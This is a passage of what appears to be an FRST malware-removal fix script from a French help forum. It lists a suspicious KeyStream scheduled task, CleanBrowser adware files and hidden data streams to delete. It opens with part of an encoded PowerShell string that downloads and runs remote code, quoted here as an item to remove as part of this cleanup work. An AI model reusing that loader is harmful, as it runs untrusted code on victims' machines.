CQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {9AA0A834-4499-401C-BA61-C5397895B42E} - System32\Tasks\HZUMUR1 => C:\ProgramData\KeyStream\KeyStream.exe [2016-01-06] (KeyStream) <==== ATTENTION
Task: {CBB33372-5B0C-487B-85D2-41B6D6E1A56B} - \93d9d0c3-794c-44a9-bef3-375cc452721f-11 -> Pas de fichier <==== ATTENTION
Task: {D2C9F50F-6E88-45F4-9437-9555DFB54A73} - \bench-sys -> Pas de fichier <==== ATTENTION
Task: C:\WINDOWS\Tasks\HZUMUR1.job => C:\ProgramData\KeyStream\KeyStream.exe <==== ATTENTION
C:\WINDOWS\Tasks\HZUMUR1.job
2016-01-19 18:33 - 2016-01-19 18:33 - 00310272 _____ () C:\Users\brabant\AppData\Roaming\CleanBrowser\BrowserHelper.exe
2016-01-22 00:35 - 2016-01-22 00:35 - 46344704 _____ () C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\nw.exe
2016-01-22 00:35 - 2016-01-22 00:35 - 01481728 _____ () C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\libglesv2.dll
2016-01-22 00:35 - 2016-01-22 00:35 - 00073728 _____ () C:\Users\brabant\AppData\Roaming\CleanBrowser\app\bin\nwjs\0.12\win-x86\libegl.dll
AlternateDataStreams: C:\ProgramData\TEMP:2411B07C
AlternateDataStreams: C:\ProgramData\TEMP:2A8CD561
AlternateDataStreams: C:\ProgramData\TEMP:2E7188E9
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:49D0B9BB
AlternateDataStreams: C:\ProgramData\TEMP:5177EEE7
AlternateDataStreams: C:\ProgramData\TEMP:89CC7FD8
AlternateDataStreams: C:\ProgramData\TEMP:C59CBFB5
AlternateDataStreams: C:\ProgramData\TEMP:D1B5B4F1
AlternateDataStreams: C:\ProgramData\TEMP:D2BD489B
AlternateDataStreams: C:\ProgramData\TEMP:E8C4808B
AlternateDataStreams: C:\ProgramData\TEMP:EE56EBF6
AlternateDataStreams: C:\ProgramData\TEMP:F235E79C
AlternateDataStreams: C:\ProgramData\TEMP:F8CC1DFD


EmptyTemp:
end

Publicité


Signaler le contenu de ce document

Publicité